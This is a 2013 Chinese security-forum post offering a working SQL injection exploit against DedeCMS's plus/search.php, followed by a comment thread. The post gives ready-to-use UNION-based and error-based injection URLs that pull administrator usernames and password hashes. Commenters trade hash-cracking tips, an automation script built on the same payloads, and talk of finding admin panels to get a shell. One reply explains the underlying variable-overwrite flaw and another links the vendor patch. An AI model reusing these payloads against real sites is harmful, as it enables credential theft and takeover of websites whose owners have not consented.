当前位置:WooYun(白帽子技术社区) >> php >> [通杀]dedecms plus/search.php 注入漏洞利用EXP

[通杀]dedecms plus/search.php 注入漏洞利用EXP

鬼哥 | 2013-01-20 00:06

转载不加作者名的没JJ

哎。没意识,我一个月前就发现了这个漏洞,可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。

既然已经发出来了,我就把我自己搞的exp发下吧。。唉。

我一般是这样测试的:
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a

转载不加作者名的没JJ
作者:鬼哥


看结果如果提示
Safe Alert: Request Error step 2 !
那么直接用下面的exp
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
2.jpg


看结果如果提示
Safe Alert: Request Error step 1 !
那么直接用下面的exp
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
1.jpg


如果正常显示证明漏洞不存在了。

转载不加作者名的没JJ

分享到:
  1. 1#
    回复此人 感谢
    Mujj (为何我的眼中饱含泪水?因为我装逼装的深沉) | 2013-01-20 00:14

    好东西,WB感谢了

  2. 2#
    回复此人 感谢
    猪猪侠 (每次有人骂我是猪我都说自己是猪猪侠) | 2013-01-20 00:19

    请洞主自查身边人,或者是不是有人其他人也挖到了,然后在那到处乱打:)

  3. 3#
    回复此人 感谢
    Say (幻觉。) | 2013-01-20 00:28

    好东西啊~~~不过这个密文怎么解密= =

  4. 4#
    回复此人 感谢
    路人戊 | 2013-01-20 00:33

    @鬼哥 有什么好办法能利用注入点 构造语句来爆绝对路径呢

  5. 5#
    回复此人 感谢
    .许仙 | 2013-01-20 01:18

    如果加了安全狗 怎么办?

  6. 6#
    回复此人 感谢
    YKS (‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌) | 2013-01-20 02:13

    关键字长度必须要3-30字节之间!

  7. 7#
    回复此人 感谢
    小威 | 2013-01-20 10:43

    第二步爆出来的密文后面还带三个省略号的是不全面的密文  怎么办????!@鬼哥

  8. 8#
    回复此人 感谢
    yexin | 2013-01-20 11:15

    想知道如何解密。。

  9. 9#
    回复此人 感谢
    txcbg | 2013-01-20 11:38

    好东西

  10. 10#
    回复此人 感谢
    c4rp3nt3r (md5.im 在线GPU后台解密。支持多种算法。) | 2013-01-20 12:37

    不知道楼主是不是最先发现的.我看了知道创宇的微博也分析了下.
    觉得最先发现的应该是白盒搜索某个关键字,然后逆向找调用发现的.
    之后高价卖到黑市,那些买家不靠谱明明可以post的偏偏get提交,最后被人抓到漏洞了.
    既然楼主没用来黑站,那么人家抓的样本就不是你的撒,就不必生气了...

  11. 11#
    回复此人 感谢
    c4rp3nt3r (md5.im 在线GPU后台解密。支持多种算法。) | 2013-01-20 13:05

    以上只是个人yy,楼主白加黑发现这么好的漏洞确实牛...

  12. 12#
    回复此人 感谢
    冷静 (黑客大黑客超级黑客黑客王,这就是我的梦想。。。。。) | 2013-01-20 14:19

    @小威 dede本来就是20位的密文,去掉前3位和最后一位就行了,那三个省略号不用管的

  13. 13#
    回复此人 感谢
    冷静 (黑客大黑客超级黑客黑客王,这就是我的梦想。。。。。) | 2013-01-20 14:20

    求大牛私信爆后台方法!有交换的

  14. 14#
    回复此人 感谢
    無情 | 2013-01-20 14:27

    好JJ

  15. 15#
    回复此人 感谢
    小威 | 2013-01-20 15:33

    @冷静 谢谢 还有就是好多站提示 “关键字长度必须要3-30字节之间!”

  16. 16#
    回复此人 感谢
    Nohat (‮ 这是什么效果‮(签名怎么会这样) | 2013-01-20 15:52

    NB,已感谢

  17. 17#
    回复此人 感谢
    苦战 | 2013-01-20 15:54

    @冷静 铜球

  18. 18#
    回复此人 感谢
    _Evil (科普是一种公益行为) | 2013-01-20 15:57

    分析

    $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;



    if(isset($typeArr) && is_array($typeArr))
        {
            foreach($typeArr as $id=>$typename)


    <font color=”Red”>$typeid = $id; </font> //这里变量覆盖

  19. 19#
    回复此人 感谢
    冉冉升起 (....ing) | 2013-01-20 17:35

    @鬼哥 转载了

  20. 20#
    回复此人 感谢
    小威 | 2013-01-20 18:14

    谢谢大牛发0day 根据这个写了个程序 勿喷
    .jpg

  21. 21#
    回复此人 感谢
    小威 | 2013-01-20 19:36
  22. 22#
    回复此人 感谢
    八云幽紫 | 2013-01-20 19:43

    找不到后台怎么破- -

  23. 23#
    回复此人 感谢
    小威 | 2013-01-20 19:49

    @八云幽紫 同样问题!!

  24. 24#
    回复此人 感谢
    x0ers (第一个知道牛奶能喝的人都对奶牛做了些什么?) | 2013-01-20 21:00

    漏洞很给力,后台很难找,要是能爆出后台的话,DEDE后台GETSHELL还是比较简单的!

  25. 25#
    回复此人 感谢
    毛猴 | 2013-01-20 21:32

    楼下继续报后台。。。。。

  26. 26#
    回复此人 感谢
    Nohat (‮ 这是什么效果‮(签名怎么会这样) | 2013-01-20 21:59

    @小威 我都是打admin

  27. 27#
    回复此人 感谢
    Say (幻觉。) | 2013-01-20 23:24

    @小威 噗 易语言写的吗0 0

  28. 28#
    回复此人 感谢
    Say (幻觉。) | 2013-01-20 23:40

    http://www.1818tt.com/thread-14083-1-1.html

    ╮(╯▽╰)╭ ↑ 看到上面这个我还真笑了

  29. 29#
    回复此人 感谢
    Say (幻觉。) | 2013-01-21 01:45

    QQ截图20130121013939.jpg

    写了个另外的EXP 如果有要的话我就发上来...写得不好= =

    唔 其实写这个东西的过程中我发现点问题
            Dim testVal As String = "/plus/search.php?keyword=as&typeArr[ uNion ]=a "
           Dim exp1 As String = "/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a"
           Dim exp2 As String = "/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a"
           ...
    本来想用testVal的提交返回的内容来判断 可是发现那个并不是特好使 我就
    Dim tmp As String = functions.GetPage(url + exp2)截取一遍
    然后tmp = functions.GetPage(url + exp1)截取一遍
    顺便把那个密文给掐头去尾变成16位了..

  30. 30#
    回复此人 感谢
    Clar | 2013-01-21 09:38

    给力,!!!

  31. 31#
    回复此人 感谢
    小威 | 2013-01-21 09:44

    @Say 这个看起来牛X好多 小菜鸟不懂高深语言 大牛莫笑

  32. 32#
    回复此人 感谢
    Say (幻觉。) | 2013-01-21 11:53

    @小威 汗我不是大牛,VB比易语言要简单一些的...~

    需要的话我把源码发给你~

  33. 33# 感谢(1)
    回复此人 感谢
    小胖子 (z7y首席代言人,园长的表哥...) | 2013-01-21 13:17

    各种工具已收下,爆后台我会乱说?

  34. 34#
    回复此人 感谢
    10457793 (看啥看) | 2013-01-21 13:44

    牛的很哦

  35. 35#
    回复此人 感谢
    sese | 2013-01-21 14:51

    请问楼主这是什么情况?
    DedeCMS Error Warning!
    Technical Support: http://bbs.dedecms.com

    Error page: /plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
    Error infos: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') UnIon seleCt 1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,2' at line 1
    Error sql: SELECT channeltype FROM `www_arctype` WHERE id=11=@`\'`) UnIon seleCt 1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 from `www_admin`#@`\'` LIMIT 0,1;


    模板文件不存在,无法解析!

  36. 36#
    回复此人 感谢
    xsser (十根阳具有长短!!) | 2013-01-21 14:53

    下次提到乌云给个响应时间吧

  37. 37#
    回复此人 感谢
    sese | 2013-01-21 15:14

    @鬼哥 模板文件不存在,无法解析!

  38. 38#
    回复此人 感谢
    猪猪侠 (每次有人骂我是猪我都说自己是猪猪侠) | 2013-01-21 15:23

    该漏洞官方早在2013-01-1推出了安全补丁!看来补丁推广要加强啊,附件上官方补丁:http://bbs.dedecms.com/572667.html

  39. 39#
    回复此人 感谢
    Lost | 2013-01-26 00:40

    这BUG封了没呢。

  40. 40#
    回复此人 感谢
    Sunshine (0123456789) | 2013-01-26 11:34

    我想说有人拿去卖500,,,吓死我了

  41. 41#
    回复此人 感谢
    北洋贱队 | 2013-01-26 13:32

    benchmark函数不可用   where也过滤了

  42. 42#
    回复此人 感谢
    蓝风 (‮#知我者謂我心憂 不知我者謂我何求#) | 2013-01-26 15:54

    我只想说 我被狗狗 秒杀了

  43. 43#
    回复此人 感谢
    lxsec (我的头像灰了!) | 2013-01-26 20:09

    @小威 测试工具似乎有些问题

  44. 44#
    回复此人 感谢
    lxsec (我的头像灰了!) | 2013-01-26 20:10

    怎么感觉这个漏洞就没流行过

  45. 45#
    回复此人 感谢
    小威 | 2013-01-26 22:39

    @lxsec 嗯 只用了第二步 对好多站都测不出

  46. 46#
    回复此人 感谢
    lxsec (我的头像灰了!) | 2013-01-27 00:53

    @小威 代码能否借来 一看

  47. 47#
    回复此人 感谢
    Say (幻觉。) | 2013-01-27 19:22

    @lxsec GET一下不就有了 = =

  48. 48#
    回复此人 感谢
    imlonghao | 2013-01-27 19:46

    公布几个MJJ的转载:
    http://hi.baidu.com/yu1u0/item/c0c60d1e6a17ce8ffeded5d7
    http://www.uedbox.com/dedecms-injection-exp-allkill/
    http://www.1818tt.com/thread-14083-1-1.html

  49. 49#
    回复此人 感谢
    陈再胜 (http://t.qq.com/mibboy求收听) | 2013-02-24 03:40

    @小胖子 怎么找,求方法

  50. 50#
    回复此人 感谢
    小威 | 2013-02-24 08:48

    @lxsec www.foxck.com

  51. 51#
    回复此人 感谢
    少校 (追求技术的巅峰,不分昼夜!) | 2013-05-30 04:08

    @小威 前去三 后减1吧!

  52. 52#
    回复此人 感谢
    x1aoh4i | 2013-05-30 08:16

    5.5

  53. 53#
    回复此人 感谢
    saber (终极屌丝之路~) | 2013-05-30 08:25

    真速度。

  54. 54#
    回复此人 感谢
    saber (终极屌丝之路~) | 2013-05-30 08:42

    @Say 求放!

  55. 55#
    回复此人 感谢
    Anonymous (但愿你是狗,牵你一起走。@z7y @小胖子@园长 噢,最怕你是狗喔,我最怕你不走。@saline @园长 从前 @z7y 有个表弟 @VIP 后来死了。) | 2013-05-30 09:29

    @Say 去前三,去后一

  56. 56#
    回复此人 感谢
    p4n9ur (- -) | 2013-05-30 10:29

    我会告诉你们哪里有 dedecms么?

    http://hiw3.com/api/cms/exp-dedecms/1

  57. 57#
    回复此人 感谢
    ccccshq (一个热爱编程,热爱网络,热爱生活的IT民工) | 2013-06-08 11:54

    收了

  58. 58#
    回复此人 感谢
    O.o | 2013-06-08 21:25

    收了!

  59. 59#
    回复此人 感谢
    Lee Swagger (one) | 2013-06-22 20:10

    @Say 发来看下  [email protected] Tks

  60. 60#
    回复此人 感谢
    Mody | 2014-05-04 21:00

    mark,成功一发

添加新回复

登录 后才能参与评论.

WooYun(白帽子技术社区)

网络安全资讯、讨论,跨站师,渗透师,结界师聚集之地

登录